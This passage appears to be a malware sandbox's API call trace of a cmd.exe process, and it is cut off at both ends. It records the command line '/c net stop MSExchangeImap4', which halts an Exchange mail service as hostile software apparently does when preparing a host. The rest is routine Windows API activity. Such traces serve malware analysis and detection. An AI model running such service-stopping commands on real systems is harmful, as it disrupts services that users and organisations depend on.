0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10320 start_va = 0x4a00000 end_va = 0x4a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a00000" filename = "" Region: id = 10321 start_va = 0x4bc0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 10322 start_va = 0x4c10000 end_va = 0x4ccdfff entry_point = 0x4c10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10323 start_va = 0x4e10000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 10324 start_va = 0x5100000 end_va = 0x510ffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 10325 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10326 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10327 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10328 start_va = 0x7e640000 end_va = 0x7e73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e640000" filename = "" Region: id = 10329 start_va = 0x7e767000 end_va = 0x7e769fff entry_point = 0x0 region_type = private name = "private_0x000000007e767000" filename = "" Region: id = 10330 start_va = 0x4a10000 end_va = 0x4a13fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 10331 start_va = 0x4a20000 end_va = 0x4a23fff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 10332 start_va = 0x5110000 end_va = 0x5446fff entry_point = 0x5110000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 631 os_tid = 0xf44 [0136.628] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0136.628] __set_app_type (_Type=0x1) [0136.628] __p__fmode () returned 0x77ac4d6c [0136.628] __p__commode () returned 0x77ac5b1c [0136.628] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0136.628] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0136.629] GetCurrentThreadId () returned 0xf44 [0136.629] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf44) returned 0x84 [0136.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0136.629] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0136.629] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.631] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.631] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4b8f8b4 | out: phkResult=0x4b8f8b4*=0x0) returned 0x2 [0136.631] VirtualQuery (in: lpAddress=0x4b8f8bb, lpBuffer=0x4b8f86c, dwLength=0x1c | out: lpBuffer=0x4b8f86c*(BaseAddress=0x4b8f000, AllocationBase=0x4a90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.631] VirtualQuery (in: lpAddress=0x4a90000, lpBuffer=0x4b8f86c, dwLength=0x1c | out: lpBuffer=0x4b8f86c*(BaseAddress=0x4a90000, AllocationBase=0x4a90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.631] VirtualQuery (in: lpAddress=0x4a91000, lpBuffer=0x4b8f86c, dwLength=0x1c | out: lpBuffer=0x4b8f86c*(BaseAddress=0x4a91000, AllocationBase=0x4a90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.631] VirtualQuery (in: lpAddress=0x4a93000, lpBuffer=0x4b8f86c, dwLength=0x1c | out: lpBuffer=0x4b8f86c*(BaseAddress=0x4a93000, AllocationBase=0x4a90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.631] VirtualQuery (in: lpAddress=0x4b90000, lpBuffer=0x4b8f86c, dwLength=0x1c | out: lpBuffer=0x4b8f86c*(BaseAddress=0x4b90000, AllocationBase=0x4b90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.631] GetConsoleOutputCP () returned 0x1b5 [0136.632] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.632] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0136.632] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.632] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0136.632] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.632] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0136.632] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.632] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0136.632] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.632] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0136.632] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.632] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0136.633] GetEnvironmentStringsW () returned 0x4d17d68* [0136.633] FreeEnvironmentStringsA (penv="A") returned 1 [0136.633] GetEnvironmentStringsW () returned 0x4d17d68* [0136.633] FreeEnvironmentStringsA (penv="A") returned 1 [0136.633] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4b8e818 | out: phkResult=0x4b8e818*=0x94) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x0, lpData=0x4b8e824*=0x11, lpcbData=0x4b8e820*=0x1000) returned 0x2 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x1, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x0, lpData=0x4b8e824*=0x1, lpcbData=0x4b8e820*=0x1000) returned 0x2 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x0, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x40, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x40, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x0, lpData=0x4b8e824*=0x40, lpcbData=0x4b8e820*=0x1000) returned 0x2 [0136.633] RegCloseKey (hKey=0x94) returned 0x0 [0136.633] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4b8e818 | out: phkResult=0x4b8e818*=0x94) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x0, lpData=0x4b8e824*=0x40, lpcbData=0x4b8e820*=0x1000) returned 0x2 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x1, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x0, lpData=0x4b8e824*=0x1, lpcbData=0x4b8e820*=0x1000) returned 0x2 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x0, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x9, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.633] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x4, lpData=0x4b8e824*=0x9, lpcbData=0x4b8e820*=0x4) returned 0x0 [0136.634] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4b8e81c, lpData=0x4b8e824, lpcbData=0x4b8e820*=0x1000 | out: lpType=0x4b8e81c*=0x0, lpData=0x4b8e824*=0x9, lpcbData=0x4b8e820*=0x1000) returned 0x2 [0136.634] RegCloseKey (hKey=0x94) returned 0x0 [0136.634] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29839 [0136.634] srand (_Seed=0x5ad29839) [0136.634] GetCommandLineW () returned="/c net stop MSExchangeImap4" [0136.634] GetCommandLineW () returned="/c net stop MSExchangeImap4" [0136.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.634] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d19cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0136.634] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0136.634] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.634] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.634] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.634] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.634] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.634] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.634] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.634] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.634] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.634] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.634] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.634] GetEnvironmentStringsW () returned 0x4d17d68* [0136.634] FreeEnvironmentStringsA (penv="A") returned 1 [0136.634] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.634] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.634] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.635] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.635] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.635] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.635] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.635] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.635] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.635] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b8f5f0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.635] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4b8f5f0, lpFilePart=0x4b8f5e8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4b8f5e8*="Desktop") returned 0x1d [0136.635] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0136.635] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4b8f370 | out: lpFindFileData=0x4b8f370) returned 0x4d105c8 [0136.635] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0136.635] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4b8f370 | out: lpFindFileData=0x4b8f370) returned 0x4d105c8 [0136.635] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0136.635] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0136.635] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4b8f370 | out: lpFindFileData=0x4b8f370) returned 0x4d105c8 [0136.635] FindClose (in: hFindFile=0x4d105c8 | out: hFindFile=0x4d105c8) returned 1 [0136.635] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0136.635] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0136.635] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0136.636] GetEnvironmentStringsW () returned 0x4d17d68* [0136.636] FreeEnvironmentStringsA (penv="=") returned 1 [0136.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0136.636] GetConsoleOutputCP () returned 0x1b5 [0136.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0136.636] GetUserDefaultLCID () returned 0x409 [0136.636] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0136.636] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4b8f720, cchData=128 | out: lpLCData="0") returned 2 [0136.636] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4b8f720, cchData=128 | out: lpLCData="0") returned 2 [0136.636] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4b8f720, cchData=128 | out: lpLCData="1") returned 2 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0136.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0136.637] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.637] GetConsoleTitleW (in: lpConsoleTitle=0x4d1a9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.638] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0136.638] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0136.638] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0136.638] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0136.638] _wcsicmp (_String1="net", _String2=")") returned 69 [0136.638] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0136.638] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0136.638] _wcsicmp (_String1="IF", _String2="net") returned -5 [0136.638] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0136.638] _wcsicmp (_String1="REM", _String2="net") returned 4 [0136.638] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0136.639] GetConsoleTitleW (in: lpConsoleTitle=0x4b8f408, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.639] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0136.639] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0136.639] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0136.639] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0136.639] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0136.639] _wcsicmp (_String1="net", _String2="CD") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="REN") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0136.640] _wcsicmp (_String1="net", _String2="SET") returned -5 [0136.640] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0136.640] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0136.640] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="MD") returned 1 [0136.640] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0136.640] _wcsicmp (_String1="net", _String2="RD") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0136.640] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0136.640] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0136.640] _wcsicmp (_String1="net", _String2="VER") returned -8 [0136.640] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0136.640] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0136.640] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0136.640] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0136.640] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0136.640] _wcsicmp (_String1="net", _String2="START") returned -5 [0136.640] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0136.640] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0136.640] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0136.640] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0136.640] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0136.640] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0136.640] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0136.640] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0136.640] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0136.640] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0136.640] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0136.640] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="CD") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0136.640] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="REN") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0136.640] _wcsicmp (_String1="net", _String2="SET") returned -5 [0136.640] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0136.640] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0136.640] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0136.640] _wcsicmp (_String1="net", _String2="MD") returned 1 [0136.640] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0136.640] _wcsicmp (_String1="net", _String2="RD") returned -4 [0136.640] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0136.641] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0136.641] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0136.641] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0136.641] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0136.641] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0136.641] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0136.641] _wcsicmp (_String1="net", _String2="VER") returned -8 [0136.641] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0136.641] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0136.641] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0136.641] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0136.641] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0136.641] _wcsicmp (_String1="net", _String2="START") returned -5 [0136.641] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0136.641] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0136.641] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0136.641] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0136.641] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0136.641] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0136.641] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0136.641] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0136.641] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0136.641] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0136.641] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0136.641] _wcsicmp (_String1="net", _String2="IF") returned 5 [0136.641] _wcsicmp (_String1="net", _String2="REM") returned -4 [0136.641] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0136.641] SetErrorMode (uMode=0x0) returned 0x0 [0136.641] SetErrorMode (uMode=0x1) returned 0x0 [0136.641] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d105d0, lpFilePart=0x4b8ef14 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4b8ef14*="Desktop") returned 0x1d [0136.641] SetErrorMode (uMode=0x0) returned 0x1 [0136.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0136.642] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.650] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.650] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.650] GetConsoleTitleW (in: lpConsoleTitle=0x4b8f194, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.650] InitializeProcThreadAttributeList (in: lpAttributeList=0x4b8f0c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4b8f0a4 | out: lpAttributeList=0x4b8f0c0, lpSize=0x4b8f0a4) returned 1 [0136.650] UpdateProcThreadAttribute (in: lpAttributeList=0x4b8f0c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4b8f0ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4b8f0c0, lpPreviousValue=0x0) returned 1 [0136.650] GetStartupInfoW (in: lpStartupInfo=0x4b8f0f8 | out: lpStartupInfo=0x4b8f0f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.650] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 